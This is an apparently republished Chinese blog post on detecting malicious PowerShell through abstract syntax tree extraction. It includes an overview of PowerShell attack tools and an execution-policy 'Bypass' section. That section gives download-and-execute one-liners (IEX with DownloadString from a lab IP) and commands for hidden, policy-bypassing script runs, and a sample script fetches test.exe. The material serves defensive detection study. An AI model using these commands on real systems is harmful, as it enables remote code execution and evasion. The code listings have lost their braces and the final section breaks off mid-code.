[系统安全] 四十三.Powershell恶意代码检测系列抽象语法树自动提取万字详解

Posted 2022-07-04 Eastmount

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了[系统安全] 四十三.Powershell恶意代码检测系列抽象语法树自动提取万字详解相关的知识，希望对你有一定的参考价值。

简单纪念下，CSDN阅读量即将破千万，全网粉丝近30万。十年啊，近700篇文章，确实可以说一句：这就是我20到30岁的青春，这里既有技术博客，也有娜璋珞一家的故事，我们的爱情史，也见证了一个自幼受贵州大山熏陶的学子慢慢成长，让我认识了许许多多的博友。如图7的苏老师，受尽挫折，博士毕业，回到家乡玉林成为了一名大学老师，今天更是自费建成了化学实验室，只想将自己的所学所感传递给他的学生。十年，我在CSDN认识了许多这样的博友、老师和大佬，我们从未谋面，我们天南地北，但相互鼓励，苔花如米小，也学牡丹开。

最后，感谢CSDN，这些年让我骗了很多礼物，更感谢每一位阅读过娜璋故事，每一位给我技术博客点赞的读者。也希望大家记住一个叫Eastmount的分享者，对，不是什么专家，也不是什么大佬，就是一个默默撰写博客的技术分享者，因为爱所以写（今年太忙写得很少很少）。我还将在CSDN写二十年，三十年，一辈子，也将记录我们一家的故事。好想继续抒写我们的故事，但太忙太忙，毕业后再好好写吧。

真的想早日毕业，回到家乡贵州继续当个教书匠，感觉好多要分享的博客，好多要上的课程，好多要开源的代码，好多要学习的知识，期待再次站在讲台前的那一天。随便参加个活动吧，我跟CSDN“生命不止，写作不熄”的故事看下面这篇文章吧！太忙太忙，这里就简单聊几句，等下一个十年，我们再详细回顾这20年的故事。继续沉下心去学习，虽菜但勤，感恩遇见，继续加油，晚安娜!

我与CSDN的这十年——笔耕不辍，青春热血

您可能之前看到过我写的类似文章，为什么还要重复撰写呢？只是想更好地帮助初学者了解病毒逆向分析和系统安全，更加成体系且不破坏之前的系列。因此，我重新开设了这个专栏，准备系统整理和深入学习系统安全、逆向分析和恶意代码检测，“系统安全”系列文章会更加聚焦，更加系统，更加深入，也是作者的慢慢成长史。换专业确实挺难的，逆向分析也是块硬骨头，但我也试试，看看自己未来四年究竟能将它学到什么程度，漫漫长征路，偏向虎山行。享受过程，一起加油~

前文简单介绍了PowerShell、Powershell恶意代码检测总结及抽象语法树（AST）提取，主要从论文的角度讲解。这篇文章将详细介绍抽象语法树的抽取方法，通过官方提供的接口实现，包括抽象语法树可视化和节点提取。希望这篇文章对您有帮助，也推荐大家去阅读论文，且看且珍惜。

希望这些基础原理能更好地帮助大家做好防御和保护，基础性文章，希望对您有所帮助。作者作为网络安全的小白，分享一些自学基础教程给大家，主要是在线笔记，希望您们喜欢。同时，更希望您能与我一起操作和进步，后续将深入学习网络安全和系统安全知识并分享相关实验。总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！如果文章对您有帮助，将是我创作的最大动力，点赞、评论、私聊均可，一起加油喔！

作者的github资源：

逆向分析：https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
网络安全：https://github.com/eastmountyxz/NetworkSecuritySelf-study

从2019年7月开始，我来到了一个陌生的专业——网络空间安全。初入安全领域，是非常痛苦和难受的，要学的东西太多、涉及面太广，但好在自己通过分享100篇“网络安全自学”系列文章，艰难前行着。感恩这一年相识、相知、相趣的安全大佬和朋友们，如果写得不好或不足之处，还请大家海涵！

接下来我将开启新的安全系列，叫“系统安全”，也是免费的100篇文章，作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等，也将通过在线笔记和实践操作的形式分享与博友们学习，希望能与您一起进步，加油~

推荐前文：网络安全自学篇系列-100篇

前文分析：

声明：本人坚决反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。

一.Powershell概述

1.高威胁

近年来，Powershell 由于其易用性强、隐蔽性高的特点被广泛应用于 APT 攻击中，传统的基于人工特征提取和机器学习方法的恶意代码检测技术在 Powershell 恶意代码检测中越来越难以有效。

Microsoft 的 PowerShell 是一种命令行 shell 和脚本语言，默认安装在 Windows 机器上。它基于微软的.NET 框架，包括一个允许程序员访问操作系统服务的接口。虽然管理员可以配置 PowerShell 以限制访问和减少漏洞，但可以绕过这些限制。此外，PowerShell 命令可以轻松地动态生成、从内存中执行、编码和混淆，从而使 PowerShell 执行的代码的日志记录和取证分析具有挑战性。

由于这些原因，PowerShell 越来越多地被网络犯罪分子用作其攻击工具链的一部分，主要用于下载恶意内容和横向移动。事实上，赛门铁克最近一份关于 PowerShell 被网络犯罪分子滥用的综合技术报告报告称，他们收到的恶意 PowerShell 样本数量以及使用 PowerShell 的渗透工具和框架的数量急剧增加。这凸显了开发检测恶意 PowerShell 命令的有效方法的迫切需要。

2.基础语法

此外，在渗透测试中，Powershell是不能忽略的一个环节，而且仍在不断地更新和发展，它具有良好的灵活性和功能化管理Windows系统的能力。一旦攻击者可以在一台计算机上运行代码，就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写到磁盘中执行，它就可以直接在内存中运行。

这些特点使得PowerShell在获得和保持对系统的访问权限时，成为攻击者首选的攻击手段，利用PowerShell的诸多特点，攻击者可以持续攻击而不被轻易发现。常用的PowerShell攻击工具有以下几种。

PowerSploit
这是众多PowerShell攻击工具中被广泛使用的PowerShell后期漏洞利用框架，常用于信息探测、特权提升、凭证窃取、持久化等操作。
Nishang
基于PowerShell的渗透测试专用工具，集成了框架、脚本和各种Payload，包含下载和执行、键盘记录、DNS、延时命令等脚本。
Empire
基于PowerShell的远程控制木马，可以从凭证数据库中导出和跟踪凭据信息，常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制。
PowerCat
PowerShell版的NetCat，有着网络工具中的“瑞士军刀”美誉，它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向，读者可以在脚本中以多种方式使用它。

在PowerShell下，类似“cmd命令”叫作“cmdlet”，其命名规范相当一致，都采用“动词-名词”的形式，如New-Item，动词部分一般为Add、New、Get、Remove、Set等，命名的别名一般兼容Windows Command和Linux Shell，如Get-ChildItem命令使用dir或ls均可，而且PowerShell命令不区分大小写。

下面以文件操作为例讲解PowerShell命令的基本用法。

新建目录：New-Item whitecellclub-ItemType Directory
新建文件：New-Item light.txt-ItemType File
删除目录：Remove-Item whitecellclub
显示文件内容：Get-Content test.txt
设置文件内容：Set-Content test.txt-Value “hello,world!”
追加内容：Add-Content light.txt-Value “i love you”
清除内容：Clear-Content test.txt

举个简单的示例：

New-Item test -ItemType directory
Remove-Item test
New-Item eastmount.txt -ItemType file -value "hello csdn"  

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

3.Bypass

经过测试，在cmd窗口执行过程下载的PowerShell脚本，不论当前策略，都可以直接运行。而如果要在PowerShell窗口运行脚本程序，必须要管理员权限将Restricted策略改成Unrestricted，所以在渗透时，就需要采用一些方法绕过策略来执行脚本。

(1) 下载远程PowerShell脚本绕过权限执行
调用DownloadString函数下载远程的ps1脚本文件。

//cmd窗口执行以下命令
powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

//在powershell窗口执行
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

下图引用谢公子的图片，切换到CMD窗口运行。

(2) 绕过本地权限执行
上传xxx.ps1至目标服务器，在CMD环境下，在目标服务器本地执行该脚本，如下所示。

PowerShell.exe -ExcutionPolicy Bypass -File xxx.ps1

powershell -exec bypass  .\\test.ps1

(3) 本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File xxx.ps1

举个示例：

powershell.exe -exec bypass -W hidden -nop test.ps1

(4) 用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden-NoProfile
-NonIIEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

函数定义：

function Test-MrParameter 

    param (
        [string]$ComputerName
    )

    Write-Output $ComputerName
	Write-Output ($ComputerName+$ComputerName)
	Write-Output ($ComputerName+$ComputerName+$ComputerName)

查看和使用函数：

Get-Command -Name Test-MrParameter -Syntax
Test-MrParameter -ComputerName 'this is a computer name'
pause

输出结果：

Test-MrParameter [[-ComputerName] <Object>]

this is a computer name
按 Enter 键继续...:

二.powershell.one

PowerShell 的抽象语法树作为代码的语义表达，以多叉树的形式表示脚本功能的逻辑结构，保留了代码上下文的特征并剔除无关的参数干扰，是分析功能类似的PowerShell代码的有效方法。常见方法是使用接口或编写自定义程序实现。前文介绍了第一种方法，这篇文章将介绍官方提供的接口。

Deobshell
https://github.com/thewhiteninja/deobshell
powershell.one => Convert-CodeToAst
https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree#ast-object-inheritance

Windows 为PowerShell提供了访问脚本AST的接口，使用内置接口获取的 AST 结构如图所示。

The Abstract Syntax Tree (AST) groups tokens into meaningful structures and is the most sophisticated way of analyzing PowerShell code.

1.概念

PowerShell解析器将单个字符转换为有意义的关键字并区分例如命令、参数和变量，这称为标记化，之前已介绍过。例如，编辑器使用这些标记为代码着色并以与命令不同的颜色显示变量。

解析器并不止于此。为了让PowerShell执行代码，它需要知道各个令牌如何形成可以执行的结构。解析器获取标记并构建一个抽象语法树（AST），它基本上将标记分组为有意义的结构。

抽象语法树之所以称为树，是因为它的工作方式类似于分层树。PowerShell从第一个标记开始，然后采用PowerShell语言定义（语法）来查看下一个可能的标记可能是什么。这样，解析器就可以通过代码工作。

情况1：PowerShell成功并创建代码的有效结构
情况2：遇到并引发语法错误

2.访问AST

从PowerShell 3 开始，抽象语法树向您公开，因此您现在也可以分析PowerShell代码并了解其内部结构。访问 AST 的主要方法有两种：

ScriptBlock（代码块）：一个scriptblock是一个有效的PowerShell代码块，所以它已经被解析器处理过了，并且解析器保证代码中没有语法错误。每个scriptblock都有一个名为AST的属性，它公开了scriptblock中包含的代码的抽象语法树。
Parser（解析器）：您可以要求PowerShell解析器解析任意代码并返回令牌和AST。当您输入和执行代码时，您基本上是在模仿PowerShell所做的事情。因为解析器处理原始文本，所以不能保证代码在语法上是正确的。这就是解析器还返回它发现的任何语法错误的原因。

查看AST的简单示例如下图所示，您可以查看解析器构建的抽象语法树(AST)。

$code.Invoke()
$code =  "Hello" * 10 
$code.Ast

输出结果如下图所示：

这可以用来创建一个简单的测试函数来识别PowerShell代码

function Test-PowerShellCode

    param
    (
        [string]
        $Code
    )

    try
    
        # try and convert string to scriptblock:
        $null = [ScriptBlock]::Create($Code)
    
    catch
    
        # the parser is invoked implicitly and returns
        # syntax errors as exceptions:
        $_.Exception.InnerException.Errors

抽象语法树(AST) 是Ast对象的树。这棵树的顶部是解析器返回给您的内容。遍历抽象语法树时遇到的任何Ast对象都具有Parent和Extent属性。Parent定义树关系，Extent定义Ast对象涵盖的PowerShell代码。

常见方法如下：

Name                   Signature
----                   ---------
Copy                   System.Management.Automation.Language.Ast Copy()
Find                   System.Management.Automation.Language.Ast Find(System.Func[System.Management.Automation.Language.Ast,bool] predicate, bool searchNestedScriptBlocks)
FindAll                System.Collections.Generic.IEnumerable[System.Management.Automation.Language.Ast] FindAll(System.Func[System.Management.Automation.Language.Ast,bool] predicate, b...
Visit                  System.Object Visit(System.Management.Automation.Language.ICustomAstVisitor astVisitor), void Visit(System.Management.Automation.Language.AstVisitor astVisitor)

三.抽象语法树可视化

1.官方示例

It may be helpful to add the Ast object relationships to the output, and visualize the tree, and how the objects are nested. That’s why I created Convert-CodeToAst that takes any simple (or complex) PowerShell code (scriptblock) and outputs the object hierarchy and involved types:

function Convert-CodeToAst

  param
  (
    [Parameter(Mandatory)]
    [ScriptBlock]
    $Code
  )


  # build a hashtable for parents
  $hierarchy = @

  $code.Ast.FindAll(  $true , $true) |
  ForEach-Object 
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
    
  
  
  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object 
      # output current ast object with appropriate
      # indentation:
      '0[1]: 2' -f $space, $_.GetType().Name, $_.Extent
    
      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      
        Visualize-Tree -id $newid -indent ($indent + 1)
      
    
  

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()

Call it like this:

Convert-CodeToAst -Code 
  # place your test code here (make it as simple as you can):
  $a = 1

运行结果：

[NamedBlockAst]: $a = 1
--[AssignmentStatementAst]: $a = 1
----[VariableExpressionAst]: $a
----[CommandExpressionAst]: 1
------[ConstantExpressionAst]: 1

函数代码解析：

如果提示禁止运行脚本，如下图所示：

需要简单设置即可。

set-ExecutionPolicy RemoteSigned
系统上禁止运行脚本

同时，建议大家在VS Code中编辑Powershell代码。

2.代码块的AST抽取

下面给出抽象语法树抽取的代码，代码比较简单，大家可以直接学习。

function Convert-CodeToAst

  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [ScriptBlock]
    $Code
  )

  # build a hashtable for parents
  $hierarchy = @

  $code.Ast.FindAll(  $true , $true) |
  ForEach-Object 
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
    
  
  
  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object 
      # output current ast object with appropriate
      # indentation:
      '0[1]: 2' -f $space, $_.GetType().Name, $_.Extent
    
      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      
        Visualize-Tree -id $newid -indent ($indent + 1)
      
    
  

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()


Convert-CodeToAst -Code $a=1

运行结果如下图所示：

3.指定PS文件的AST抽取

直接给出指定PS脚本文件的抽取代码。

完整代码及详细注释如下所示：

function Convert-CodeToAst

  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: 0" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($content)

  # 提取AST
  $code.Ast.FindAll(  $true , $true) |
  ForEach-Object 
    # take unique object hash as key
    $id = 0;
    if($_.Parent) 
      $id = $_.Parent.GetHashCode()
    
    Write-Debug('0:1' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) 
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  
  
  # 递归可视化树
  function Visualize-Tree($Id, $Indent = 0)
  
    # 每级缩进
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object 
      # 输出AST对象
      '0[1]: 2' -f $space, $_.GetType().Name, $_.Extent
    
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()
      # 递归其子节点（if any)
      if ($hierarchy.ContainsKey($newid)) 
        Visualize-Tree -id $newid -indent ($indent + 1)
      
    
  

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result


Convert-CodeToAst -str .\\data\\example-001.ps1

此时输出结果如下图所示：

假设存在“example-002.ps2”文件。

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');

对应的AST如下：

PS D:\\powershell> .\\get_ast_002.ps1
file name: .\\data\\example-002.ps1
powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
[NamedBlockAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--[PipelineAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
----[CommandAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
------[StringConstantExpressionAst]: powershell
------[InvokeMemberExpressionAst]: (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--------[ParenExpressionAst]: (new-object system.net.webclient)
----------[PipelineAst]: new-object system.net.webclient
------------[CommandAst]: new-object system.net.webclient
--------------[StringConstantExpressionAst]: new-object
--------------[StringConstantExpressionAst]: system.net.webclient
--------[StringConstantExpressionAst]: downloadfile
--------[StringConstantExpressionAst]: 'http://192.168.10.11/test.exe'
--------[StringConstantExpressionAst]: 'test.exe'

那么，如果我只想提取节点，怎么实现呢？

四.抽象语法树节点提取

1.提取AST节点

采用后序遍历提取AST节点，具体代码如下：

function Convert-CodeToAst

  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: 0" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($str)

  # 提取AST
  以上是关于[系统安全] 四十三.Powershell恶意代码检测系列 抽象语法树自动提取万字详解的主要内容，如果未能解决你的问题，请参考以下文章 
 [系统安全] 四十三.APT系列Powershell和PowerSploit脚本渗透攻击手段详解
 [系统安全] 四十七.Powershell恶意代码检测系列 Powershell基础语法和注册表操作
 [系统安全] 四十六.Powershell恶意代码检测系列 Powershell基础入门及管道和变量的用法
 [系统安全] 四十二.Powershell恶意代码检测系列 论文总结及抽象语法树（AST）提取
 [系统安全] 四十二.Powershell恶意代码检测系列 论文总结及抽象语法树（AST）提取
 网络安全系列-四十三:使用Suricata分析恶意流量pcap文件

[系统安全] 四十三.Powershell恶意代码检测系列 抽象语法树自动提取万字详解